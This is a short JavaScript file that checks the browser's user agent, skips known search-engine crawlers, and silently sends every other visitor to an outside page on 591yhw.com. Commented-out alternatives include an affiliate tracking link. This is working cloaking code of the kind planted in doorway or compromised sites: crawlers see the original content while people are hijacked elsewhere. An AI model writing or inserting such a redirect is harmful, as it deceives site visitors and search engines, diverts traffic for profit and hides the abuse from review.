﻿var s=document.referrer.toLowerCase();
var ua = navigator.userAgent.toLowerCase();
if(ua.indexOf("bot")>0 || ua.indexOf("crawl")>0  || ua.indexOf("spider")>0  || ua.indexOf("slurp")>0  || ua.indexOf("sohu-search")>0  || ua.indexOf("360")>0  || ua.indexOf("robozilla")>0 ){
}
else{

				//window.location.replace("http://www.591yhw.com/article/muyingjianlouqun.html");
				window.location.replace("http://www.591yhw.com/lp/m/");
				//window.location.replace("https://c.duomai.com/track.php?k=nZ9QWa1VmJxYTPklWYmcDN1MDNy0DZp9VZ0l2cm02bj5CZq5yd3dnRyUiRyUSQzUCc0RHa9QnJxp");
				
}